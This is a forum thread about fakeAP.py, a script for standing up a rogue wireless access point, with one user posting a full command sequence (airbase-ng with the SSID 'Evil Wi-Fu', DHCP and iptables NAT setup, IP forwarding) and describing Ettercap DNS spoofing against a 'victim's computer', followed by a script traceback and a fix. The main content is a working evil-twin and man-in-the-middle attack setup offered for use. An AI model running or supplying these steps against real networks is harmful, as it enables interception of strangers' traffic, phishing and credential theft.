Results 1 to 5 of 5

Thread: fakeAP.py - Automatically create a fake AP

  1. #1

    fakeAP.py - Automatically create a fake AP

    Pwnstar is a great script and I pulled my commands from it but it requires lots of user input. This script aims to remove the manual settings entries in creating a fake AP. Just run and you're off to the races.

    https://github.com/DanMcInerney/fakeAP

  2. #2
    Join Date
    2013-Jun
    Posts
    123
    Thanks for the share.

    I've been using zimmaro's method here ... http://vimeo.com/73069192

  3. #3
    Join Date
    2014-Feb
    Location
    Italy
    Posts
    3
    Hello to all,
    I'm new I would like to create a FAKE AP + + DNS_SPOOF msfconsole, can someone help me?

    CREATE FAKE AP


    ----------------------------------------
    CODE
    ----------------------------------------
    airmon-ng start wlan0
    airbase-ng -e "Evil Wi-Fu" -c 11 mon0
    ifconfig at0 10.0.0.254 netmask 255.255.255.0
    ifconfig at0 up
    ifconfig eth0 up && dhclient3 eth0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    ./iptables-flush.sh
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    echo 1 > /proc/sys/net/ipv4/ip_forward

    ------------------------------------------------------------------
    /etc/dhcpd3/dhcpd.conf
    ------------------------------------------------------------------
    dens-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.254;
    option domain-name-servers 8.8.8.8;
    range 10.0.0.1 10.0.0.140;
    }
    -----------------------------------------------

    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT

    -----------------------------------------------

    ETTERCAP with removal of # and privileges changed to "0" (etter.conf)

    change my IP (etter.dns)

    then activate plugin and start dns_spoof MITM

    -------------------------------------------------------

    I then turned on apache and I tried to go with the victim's computer at google.com, but does not appear " it's works " of APACHE


    thanks for your attention.

  4. #4
    Join Date
    2013-Jun
    Posts
    123
    Quote Originally Posted by flyingtriangle View Post
    Pwnstar is a great script and I pulled my commands from it but it requires lots of user input. This script aims to remove the manual settings entries in creating a fake AP. Just run and you're off to the races.

    https://github.com/DanMcInerney/fakeAP

    root@kali:~/howto/fakeAP-master# python fakeAP.py[*] Cleared leases, started DHCP, set up iptables[*] Starting the fake access point...
    Traceback (most recent call last):
    File "fakeAP.py", line 310, in <module>
    main(parse_args())
    File "fakeAP.py", line 299, in main
    dhcp(dhcpconf, ipprefix)
    File "fakeAP.py", line 241, in dhcp
    dhcp = Popen(['dhcpd', '-cf', dhcpconf], stdout=PIPE, stderr=DN)
    File "/usr/lib/python2.7/subprocess.py", line 679, in __init__
    errread, errwrite)
    File "/usr/lib/python2.7/subprocess.py", line 1259, in _execute_child
    raise child_exception
    OSError: [Errno 2] No such file or directory

  5. #5
    That is due to Kali removing isc-dhcp-server for the latest release. I have since fixed the script to install that for you should you want it.

Similar Threads

  1. Replies: 1
    Last Post: 2019-12-28, 01:38
  2. PwnSTAR and Automatically open page on Fake-AP
    By markrenton in forum Project Archive
    Replies: 0
    Last Post: 2015-09-17, 10:52

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •